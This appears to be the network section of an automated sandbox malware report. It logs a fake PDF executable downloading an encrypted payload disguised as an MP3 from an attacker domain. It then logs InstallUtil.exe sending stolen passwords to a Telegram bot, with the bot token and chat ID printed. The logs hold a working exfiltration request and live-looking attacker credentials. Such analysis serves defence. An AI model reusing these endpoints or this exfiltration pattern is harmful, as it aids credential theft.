                                                                        Oct 15, 2024 21:32:28.343404055 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.343549967 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.343727112 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.343972921 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.344106913 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.344177008 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.345077991 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.345153093 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.345318079 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.345387936 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.345586061 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.345657110 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.412091017 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.412169933 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.412205935 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.412216902 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.412260056 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.412475109 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.412525892 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.412837982 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.412899971 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.413086891 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.413145065 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.413537025 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.413606882 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.413779974 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.413836956 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.413991928 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.414056063 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.464546919 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.464631081 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.464927912 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.464998007 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.465163946 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.465225935 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.466464996 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.466530085 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.467026949 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.467087984 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.467152119 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.467211008 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.467392921 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.467454910 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.530689955 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.530838013 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.531017065 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.531075954 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.531234980 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.531290054 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.531533003 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.531590939 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.531899929 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.531965017 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.532222033 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.532279015 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.532461882 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.532521963 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.532716990 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.532777071 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.587415934 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.587497950 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.587631941 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.587683916 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.587902069 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.587960005 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.588263035 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.588331938 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.588460922 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.588520050 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.588876963 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.588924885 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.588934898 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.588948965 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.588968992 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.589024067 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:28.589059114 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:28.591835022 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:30.744390965 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:30.744452953 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:30.744571924 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:30.803311110 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:30.803335905 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.672957897 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.673026085 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:31.675815105 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:31.675826073 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.676062107 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.725509882 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:31.731807947 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:31.779402018 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.969170094 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:31.969733953 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:31.969769955 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:32.320910931 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:32.321954966 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:32.322036028 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:32.322205067 CEST44349831149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:32.322278976 CEST49831443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:32.322391987 CEST49831443192.168.2.6149.154.167.220

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 15, 2024 21:32:01.198885918 CEST5707453192.168.2.61.1.1.1
                                                                        Oct 15, 2024 21:32:01.938585043 CEST53570741.1.1.1192.168.2.6
                                                                        Oct 15, 2024 21:32:11.506774902 CEST6460153192.168.2.61.1.1.1
                                                                        Oct 15, 2024 21:32:11.635629892 CEST53646011.1.1.1192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 21:32:01.198885918 CEST192.168.2.61.1.1.10x80d8Standard query (0)rubberpartsmanufacturers.comA (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 21:32:11.506774902 CEST192.168.2.61.1.1.10x3270Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 21:32:01.938585043 CEST1.1.1.1192.168.2.60x80d8No error (0)rubberpartsmanufacturers.com103.191.208.122A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 21:32:11.635629892 CEST1.1.1.1192.168.2.60x3270No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • rubberpartsmanufacturers.com
                                                                        • api.telegram.org

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649711103.191.208.1224436272C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 19:32:03 UTC99OUTGET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1
                                                                        Host: rubberpartsmanufacturers.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:03 UTC235INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 19:32:03 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Tue, 15 Oct 2024 03:31:25 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 990216
                                                                        Content-Type: audio/mpeg
                                                                        2024-10-15 19:32:03 UTC7957INData Raw: 0d 53 95 bc 78 07 1b 11 e6 75 e1 47 ba c4 44 0a b5 a8 58 f1 8c a0 c7 d2 9e 9f f9 ff 95 f8 5f a2 04 32 89 f9 c2 07 ea 05 3a df a7 d6 5e c7 f2 7a 2e 42 a0 1b 78 b4 5a 16 e6 f9 08 b3 23 19 af e2 06 25 cb fe 8e db c7 31 02 77 25 cb de 37 02 00 e0 64 d6 98 87 23 10 78 e5 6d 91 d5 82 49 0c c4 da 94 83 4e b1 9a 1e 8f 96 fc df e8 f7 e2 17 2a 5e f9 c7 36 38 1a af aa 11 96 cd 00 ac 2c f2 ea da 52 aa 87 0c c7 a7 ec 36 60 96 9e 4a 5b 7c 77 71 48 a8 f5 74 7a 0e 35 e3 03 6f 53 35 d7 24 d0 89 f6 49 1c d9 c4 9a b0 ff c6 98 97 09 a7 86 e0 cb ed 90 03 55 c7 2c 65 db 86 6f fc b1 65 ae 2f 31 6c 97 7d 97 cd c1 ee 1c 18 16 e2 e5 43 fc 7e f7 09 21 24 a2 c0 ec a1 4f 6f ad d1 61 5b 0e 85 3e ca 1c d7 0b c6 ba 4d cc 84 03 83 69 ed 00 5c 80 00 bc f5 b1 5d f3 64 75 38 bb aa a0 ab 22
                                                                        Data Ascii: SxuGDX_2:^z.BxZ#%1w%7d#xmIN*^68,R6`J[|wqHtz5oS5$IU,eoe/1l}C~!$Ooa[>Mi\]du8"
                                                                        2024-10-15 19:32:03 UTC8000INData Raw: 1d fc c0 21 ae 2b 34 22 5f 05 bb 10 0f 19 5e db 3b c1 5e a0 76 27 2d 03 f8 a5 39 b7 7e f0 a8 b9 e1 1a ef 97 97 23 4e 34 a9 c4 40 3d 76 97 95 95 c1 cc 75 7b 3e 9f 36 ef 6e 93 56 d6 3e 68 10 bf 16 7f ee 6c 37 06 fd 77 6f 0c 1c 95 05 ce ec ac 05 b7 68 3e ea a7 20 ff 81 23 41 f2 42 49 0d 36 61 4a 14 83 9c 7c 03 f4 50 93 e6 19 e9 c2 dd d6 f8 6a ae 4c a7 64 93 cd 8b 5b 5f 18 9f 59 83 d0 96 8d f7 1f 3d a1 07 57 e1 bc 89 0c 95 5e 65 4f 92 4a 18 ef ef 29 e3 73 68 4c 12 f2 e8 07 37 c8 e7 ff 77 3c 5e 71 eb 9e 10 98 1f c0 83 3a f5 38 60 28 f9 56 76 1c 9e 0e f6 fa 68 ef ea 78 5f d8 21 66 e9 32 56 41 aa 1a c9 82 c5 55 6e fd 1c 73 52 8d e6 53 0e 52 66 e4 8a 6d b5 43 cc 37 11 a5 de 58 e4 49 fa 0b 7a 56 46 e5 e8 78 a4 f1 37 b2 cc 7f 0a 76 c1 a5 74 82 29 fb a9 d3 a7 a5 35
                                                                        Data Ascii: !+4"_^;^v'-9~#N4@=vu{>6nV>hl7woh> #ABI6aJ|PjLd[_Y=W^eOJ)shL7w<^q:8`(Vvhx_!f2VAUnsRSRfmC7XIzVFx7vt)5
                                                                        2024-10-15 19:32:03 UTC8000INData Raw: b6 38 23 97 0f c1 d2 f3 e2 90 07 ec 02 c0 34 7f 61 4d 15 26 a3 2b 74 66 4e 8b 62 c2 75 b6 20 d0 6e 9c 37 80 5b 96 81 5a e4 0d 01 74 9b 88 dc b8 3a e9 d0 b0 ee c1 fb 57 d4 87 84 3b c0 e9 2d b5 a6 7d 32 a7 0e dd a7 c6 81 65 5b b3 4b 23 ad b7 8d 45 08 00 f4 aa 20 4c d9 66 d2 0c a2 8f 29 b0 1e a4 33 54 88 d9 a1 cc d6 1c f9 c7 e5 b0 ee b8 c5 eb 51 ce dc 8d 20 e2 a3 7c 1a de 54 74 d9 06 65 d1 d8 19 26 3e 0e fa 13 d6 19 58 6c 37 8d a1 00 02 61 46 b3 1b fd c3 9c b6 3a 7e 84 6d 99 9a 56 fe 01 d0 2a 19 87 36 fa be 96 cf 5c 1e d8 03 55 9b e1 cb 2f 85 dc f2 32 00 f4 93 ca b6 85 7a ca 01 1e b3 f2 24 9b b5 ca 7d 5e 28 fc 2f 03 98 db 03 c7 25 cb d4 a7 91 1d 86 df 67 3a ac 84 aa 12 89 48 b5 ae 5b 5c 72 19 6e 04 63 f7 d2 37 4a 9f 56 91 3a d9 2c 6c 38 e2 28 61 32 29 6a fb
                                                                        Data Ascii: 8#4aM&+tfNbu n7[Zt:W;-}2e[K#E Lf)3TQ |Tte&>Xl7aF:~mV*6\U/2z$}^(/%g:H[\rnc7JV:,l8(a2)j
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: 2e 98 38 84 64 33 21 89 99 a0 60 02 7a 11 6b c2 85 3a 73 91 aa 9a 1f fe 33 e9 e8 70 86 5f a4 a6 06 a5 ab 5d 33 7b 54 6a db d1 f2 c0 a5 af 23 8a ec ad 6f 78 d5 cb 3a 67 e6 39 da fa 74 b2 45 2a 19 df 5c 72 46 ca cd e3 29 d2 17 47 0c d8 57 1c a8 08 77 79 f2 c1 a2 a7 16 4a 88 3f 5e 19 62 16 2c 8e c3 cc 3a bc fc 7d 42 5a 0e e7 3c b6 e9 59 52 21 bf 14 54 a3 04 be fa c7 a4 f0 d6 36 4b dd 58 2f 4c 2b 6c 72 28 b7 16 08 66 51 68 78 e8 32 d9 20 16 d1 5a dd bf 85 d4 81 e2 9f 11 a1 6c b2 98 f0 b3 66 57 01 8d 9d 43 39 dc 50 4f c0 f6 ec b0 18 be 47 84 a2 76 dc fe aa 51 c6 69 fc 11 14 a5 18 c2 73 b0 e4 98 8d c5 8a ae 9c e6 02 51 ab 62 85 84 db c1 5d 6d 0f 0f 13 92 b7 3d 67 42 0e 3a b0 9c 80 e9 c9 ac b7 3c e5 c1 ff 48 9d fa 32 bf f1 b4 70 9e f1 4f 70 81 86 ff a8 22 ab 72
                                                                        Data Ascii: .8d3!`zk:s3p_]3{Tj#ox:g9tE*\rF)GWwyJ?^b,:}BZ<YR!T6KX/L+lr(fQhx2 ZlfWC9POGvQisQb]m=gB:<H2pOp"r
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: 55 af 10 d5 8c 3b a3 d8 ed c5 e5 f3 89 6d d3 70 05 c9 2f 10 62 8a 03 8c cb 27 7c 45 d9 5a 35 ff 75 52 08 cb 62 8b ad 78 b2 c5 df 16 f3 7b 00 77 01 03 f7 43 6d 16 0e ae d1 b4 08 5a 7c f6 29 3a 47 47 67 bd fe 92 3c 7d 8a 66 9f d0 c6 2d 6d 3b c6 08 26 8e 49 97 a3 af 8c 48 d2 ed 27 67 db 1d c9 04 41 91 a6 06 9d 2b d7 0b d5 a1 c7 b9 cf 13 49 09 4c a1 30 5e bd d3 b1 c3 45 6b 97 47 2a 3b 0a 6d 52 a2 13 ad 29 6a 2e f6 25 32 72 16 c9 d4 bf 38 a9 02 23 56 7d c3 05 51 07 75 51 99 48 48 85 9c 38 4f 70 df 2f aa 42 dd 9e ac 55 62 c0 ba 0a 89 84 22 b0 e4 77 e9 28 81 c5 e4 e9 f6 8d 39 a8 08 8e 2d 3b 2b 14 88 c0 fa 7a 25 33 c0 b1 12 12 0d 65 c3 62 63 a8 12 d7 92 bc b5 46 97 c2 09 3f 1b 09 b2 1e ab bc cc 78 56 1b f5 55 7e 02 19 5a fc 4d e1 10 a7 7b 81 cd 34 f7 8d a3 9e 4b
                                                                        Data Ascii: U;mp/b'|EZ5uRbx{wCmZ|):GGg<}f-m;&IH'gA+IL0^EkG*;mR)j.%2r8#V}QuQHH8Op/BUb"w(9-;+z%3ebcF?xVU~ZM{4K
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: 02 7b 65 46 0e 46 4e b2 74 fd 8b 8a db e1 51 6a 87 7a 7d 85 1a 3b 73 8d 53 32 6e 9c ce c6 ae 17 c9 16 93 31 5d de 99 19 26 b4 fe 87 e4 85 0e 59 7d 04 e0 66 e9 04 91 c1 7c ef 9b 49 4d 47 13 cb 91 2a d2 55 6a 1e 73 1c f3 fd 1e a0 63 be 49 e4 70 f3 36 55 c0 df 27 67 9a 2f 8f c7 6b 16 09 90 84 b8 c5 49 94 a3 b5 d3 99 1e 98 9b 74 9d 63 17 55 5f 69 52 0b 27 59 fd 5d 0b 1f 0b f5 8c 68 17 be 06 60 35 11 95 3c f8 1f f9 ad 74 08 7a 73 a8 31 34 e0 f3 72 be 28 0e 86 be 83 e8 0a 8f af 12 b4 8a 0a 8e ab 51 f4 dc 87 a5 19 8c 7b d2 75 d7 fe 71 36 c4 1d 00 3d 84 18 5b 1a 18 9a e9 75 b8 00 75 d5 50 93 0a 40 6c 3e 4f b4 c8 d2 3a 7d af f8 b0 54 f9 77 00 ad 3f c6 90 8c 41 65 48 a6 21 8c 82 85 07 b7 24 89 e6 e8 e2 f1 b4 01 6e d9 37 b1 12 d7 82 22 33 52 bd d9 11 75 c9 e9 59 ed
                                                                        Data Ascii: {eFFNtQjz};sS2n1]&Y}f|IMG*UjscIp6U'g/kItcU_iR'Y]h`5<tzs14r(Q{uq6=[uuP@l>O:}Tw?AeH!$n7"3RuY
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: e9 c3 52 b8 f5 96 44 18 89 aa 92 a7 e6 36 af a0 35 4d 29 0e 1c f0 b1 72 42 ca af d4 c4 f0 ea 9b a2 20 c6 1e 03 a8 9e 40 ef 9a e1 95 29 a3 e1 49 0a a2 b6 31 b1 e3 42 c9 2e 6f 95 15 84 b7 87 75 b6 5e 39 b0 a8 05 3d a1 7b 18 87 34 a8 4c 7a d9 7c da 85 b6 8f 14 0d 19 36 a3 d2 92 b1 98 24 2e 84 92 62 66 32 dd f3 c9 2e 36 c5 98 72 8a 77 5b 6a 9d b8 4e 2e e1 eb 0c e2 49 fe d2 35 8b 85 8d 6a 39 be 7e c0 ea 9a 70 40 00 94 ba 2b f8 a9 54 30 15 95 d3 5e 24 06 a6 49 e3 11 2a ea ed 11 f2 ed 34 db 44 6f 28 5f 6e 4f 32 51 5f fe 77 ba 6f 6b 2d e9 b0 2d c3 4f ab 0d aa 39 1e 38 4e 5c 40 1f 8d a6 88 61 5f 5c 25 72 ae a1 57 0a 9c 3c ad 2b 76 14 3f 88 23 74 59 b3 3b 44 9e 53 af 23 20 9c 9d c3 e2 53 cf db ad 1d 31 6b c9 c1 6e 6b 14 9f 43 1a 06 e0 cf f7 4a 47 f8 4d 0b 1e b5 d5
                                                                        Data Ascii: RD65M)rB @)I1B.ou^9={4Lz|6$.bf2.6rw[jN.I5j9~p@+T0^$I*4Do(_nO2Q_wok--O98N\@a_\%rW<+v?#tY;DS# S1knkCJGM
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: 8c ce e9 7b 11 12 a8 86 7f c0 84 ee fa d8 20 76 09 45 42 41 d3 4d 90 43 17 94 7b eb 71 fb 9a 0b ab f5 74 d1 2c f3 4a a3 fe bf 35 01 a1 3a 48 33 4a 7b ff b2 5a c3 0f 37 24 dd 0d ed 5b ca c9 8d 1d 43 fb 36 e6 59 a9 b1 0c 14 43 a6 e9 1d 6d 6d fa 86 05 36 ab 5b 3c 9d 6d 9d 98 cf e9 39 83 50 bd d5 31 3f 8f ca a8 e9 ec a7 b9 d7 a5 e6 ee 99 16 b4 a1 5e 1d e9 cc 50 e9 84 b9 98 58 a4 41 66 fb 45 25 d4 58 49 e3 0d cd 58 2f 19 87 55 3f f7 a6 bf 38 d9 0c 7d ba b9 90 5e 3f 5b 83 3c 7a b5 41 44 4a 5d be 02 92 6d bf 6b 93 b1 01 a0 89 03 54 0d 08 65 1b 7c 58 d2 cf b9 f9 27 6d a4 a4 58 99 0f c6 c4 45 8f c6 0d fe f0 86 e3 5b 32 16 be 01 58 ce 6b 52 b8 a6 31 ea e5 c0 0f ef 08 71 91 ef 94 f1 fa 51 26 ef e4 3b 6b 15 0b 85 7c b6 a4 33 a8 11 2a 95 4d ab fc be 50 22 a8 f7 e0 57
                                                                        Data Ascii: { vEBAMC{qt,J5:H3J{Z7$[C6YCmm6[<m9P1?^PXAfE%XIX/U?8}^?[<zADJ]mkTe|X'mXE[2XkR1qQ&;k|3*MP"W
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: b0 10 6f 7d 77 fe 04 d1 65 28 25 12 95 a1 01 d1 c7 b6 66 39 a4 cd 37 f0 80 6b d9 d7 b3 fb 94 89 8c 51 48 4f 68 8c da 84 84 89 ae 87 ec f7 d8 ef 7d 16 98 4b 1c a2 90 38 0b e5 9d 94 1e 9b 6a 60 82 6c db d4 4e 08 d9 80 f1 da 24 00 69 70 1d 04 4c 27 2e 62 df ae af 97 14 a7 30 a2 2c ee 8b a1 e7 35 88 72 f3 f8 ea 6e 3f 11 d6 87 bc 3d 20 81 08 32 59 02 1b 80 0e 6b 0b 67 9d 42 d5 24 b2 e7 bc cc bd f5 52 56 52 00 d2 5a e4 45 85 1e 29 63 57 67 47 e7 92 69 3a 2b 6f 11 9c 57 75 63 0b 60 0f 4a 2b 99 26 1e c5 d8 dd bd 0c 82 48 bf 6b 28 3b 1d 58 9f 4d ae 7d 3e 20 97 38 35 50 03 88 22 1e 24 06 02 97 9b f9 2f f3 21 ed 7e 05 ce 70 5e 51 5d 2b ff a4 33 28 8b 3a c0 6c db a0 63 75 f2 29 38 c3 cd 89 b0 f3 23 84 af 03 d3 23 6e 46 cb bb c5 24 2d 8d 74 ec 73 3f a9 12 67 0d 11 82
                                                                        Data Ascii: o}we(%f97kQHOh}K8j`lN$ipL'.b0,5rn?= 2YkgB$RVRZE)cWgGi:+oWuc`J+&Hk(;XM}> 85P"$/!~p^Q]+3(:lcu)8##nF$-ts?g
                                                                        2024-10-15 19:32:04 UTC8000INData Raw: 73 c4 65 7d a8 1f 32 a2 5a 29 2e 40 33 ed 7c 5b 0c 86 d8 60 60 45 21 df 39 b9 1f 06 b1 b1 45 57 4b d3 f7 97 79 69 fe 99 10 8a c3 79 26 b5 dd ec 30 4a 39 3e 18 0e 84 a0 f9 1b bf b4 10 03 5e e6 71 8c 0c 3c 16 3c eb 20 d5 f9 67 78 d3 54 b5 60 0c ae 02 3c f4 d1 b1 51 84 c4 89 63 e9 2c 40 8c 61 7e 06 1b f3 47 7e 9b 17 9f 61 cd 40 51 ef f6 79 ac df 20 d5 8b 32 b2 25 0c ae 89 45 65 06 9e 56 44 71 42 fa 7c 2c 88 04 ba 5f 39 c0 9d 3d ae 0f e6 63 a7 42 8a d9 f3 4a 54 e7 73 bb 6c 45 69 b2 b5 ab f1 73 38 c1 57 0f 92 a7 a7 9d 11 e8 40 e7 b4 91 c7 3b 4b 1f ae 2c 37 5a 08 b1 3b ff f5 41 71 bc 9e 5b c0 8a ca a6 90 52 14 d6 86 95 52 9d 04 9a ff f1 ad 9c dd 9e 3f 55 2c 86 07 3d 76 dc 7b ee 0f 41 cd 1c 7d 76 22 39 8a fe ee 38 a3 2d 9f 5a b0 d5 a6 ae 8c 8c bb b3 34 63 68 51
                                                                        Data Ascii: se}2Z).@3|[``E!9EWKyiy&0J9>^q<< gxT`<Qc,@a~G~a@Qy 2%EeVDqB|,_9=cBJTslEis8W@;K,7Z;Aq[RR?U,=v{A}v"98-Z4chQ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649739149.154.167.2204431472C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 19:32:12 UTC260OUTPOST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837
                                                                        Host: api.telegram.org
                                                                        Content-Length: 924
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:12 UTC25INHTTP/1.1 100 Continue
                                                                        2024-10-15 19:32:12 UTC924OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 32 65 38 39 30 35 61 38 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 37 33 37 31 39 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 32 65 38 39 30 35 61 38 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 35 2f 32 30 32 34 20 31 35 3a 33 32 3a 31 30 0a 55 73 65 72
                                                                        Data Ascii: -----------------------------8dced2e8905a837Content-Disposition: form-data; name="chat_id"1673719962-----------------------------8dced2e8905a837Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/15/2024 15:32:10User
                                                                        2024-10-15 19:32:13 UTC1038INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 15 Oct 2024 19:32:13 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 650
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
